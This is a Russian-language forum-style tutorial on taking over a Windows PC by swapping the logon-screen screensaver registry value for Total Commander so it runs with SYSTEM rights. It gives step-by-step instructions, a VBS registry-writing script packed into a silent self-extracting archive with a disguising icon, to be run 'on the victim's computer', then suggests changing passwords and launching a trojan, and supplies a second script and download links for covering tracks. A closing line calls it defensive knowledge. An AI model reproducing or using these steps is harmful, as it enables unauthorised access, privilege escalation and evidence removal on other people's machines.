|
Взлом осуществляется подменой заставки которая запускается если выйти в экран приветствия (то есть выходом из всех пользователей.....), на Тотал Коммандер, который будет иметь полные Админские права.........
Для этого нам понадобится 1 самораспоковывающийся файл, я его создал винраром......
Самораспаковывающийся архив содержит в себе ТОТАЛ КОМАНДЕР и vbs файл, который изменяет стандартную заставку на ТКМД. Этот ехешник сам выполняет то что надо просто его надо запустить, не удивляётесь если почле запуска ничего не произойдёт, файл работает в фоне....
Вот что вам следует сделать:
1. Для Взлома нужно скопировать все установленные файлы Total Commander'a
в %SYSTEMROOT%\SYSTEM32\ у многих это тут С:\WINDOWS\system32\. (То есть надо найти папку винды (Windows) и в папке винды найти system32 ту и залить файлы)
Потом запускаем редактор реестра (regedit) заходим HKEY/USERS/DEFAULT/Control Panel/Desktop. В строковом параметре "SCRNSAVE.EXE" меняем значение scrnsave.scr на Totalcmd.exe.
У разных версий винды это значение неодинаковое.......... значение SCRNSAVE.EXE могут быть и scrnsave.scr и logon.scr...... по этому запомните начальное значение, так как придётся заметать следы..........
Там же находится еще один параметр "ScreenSaveTimeOut". Он отвечает за время через которое запустится скринсейвер, в нем ставим значение 100 (это примерно 2мин.) Иногда этого не достаточно чтобы все сработало на 100% тогда запускаем в реестре поиск и прописываем SCRNSAVE.EXE и ищем все параметры с таким названием, изменяя значения на выше указанные.
Каждый раз при взломе разбиратся с этим нудное дело, можно создать одирн файл, который всё это выполнит....
Значит создаём винраром SFX архив, там у нас будет Тотал командер и VBS файл.
Тело VBS
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite "HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.exe","Имя.Расширение" запускаемого файла, вместо скринсейвера....В данном случае (по дефолтуTotalcmd.exe)"
Пишем куда извлекатьв винраре %systemroot%\system32
Пишем туда где написано запуск программы после извлечения архива (в винраре) %sytemroot%\system32\имя_файла.расширение (vbs)
В винраре вибыраем ничего не показывать, также можно выбрать иконку для маскировки.......
Если кому то лень с этим Возиться то вот готовый файл http://depositfiles.com/files/0xp01dbggl
2. Запустить его на компе жертвы и подождать 30 сек...
3. Сделать выход из пользователя....
4. Ждать максимум 5 минут.........
5. И всё... На компе запустится ТОТАЛ КОММАНДЕР с полными правами Админа! (так как его запускает SYSTEM)
Теперь вы можете запустить и управление пользователями (Там можно поменять пароли), и запустить троян и установить игрушку итд итп, но не надо закрывать тотал командер во время работы!!!! ЛУЧШЕ СВЕРНУТЬ..........
Но надо ещё замести следы! Для этого нужно будет создать лекарство.....
Открываем Блокнот и пишем туда
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite "HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.exe","scrnsave.scr или logon.scr надо было запомнить" "
fso.deletefile "C:\windows\System32\Totalcmd.exe",1
сохраняем как vbs и запускаем
этот файл Заметает следы
Если кому то лень с этим разбираться вот эти два лекарства >>> http://depositfiles.com/files/d5j8jzspdl
Можете проделать выше написанное на своём компе если не верите что сработает...
вобщем это самый безопасный и лёгкий метод...
P.S. Новички не надо этого делать из-за нефиг делать... статья только для того чтобы знать от чего обороняться...
Комментарии
 |
Безопасность 
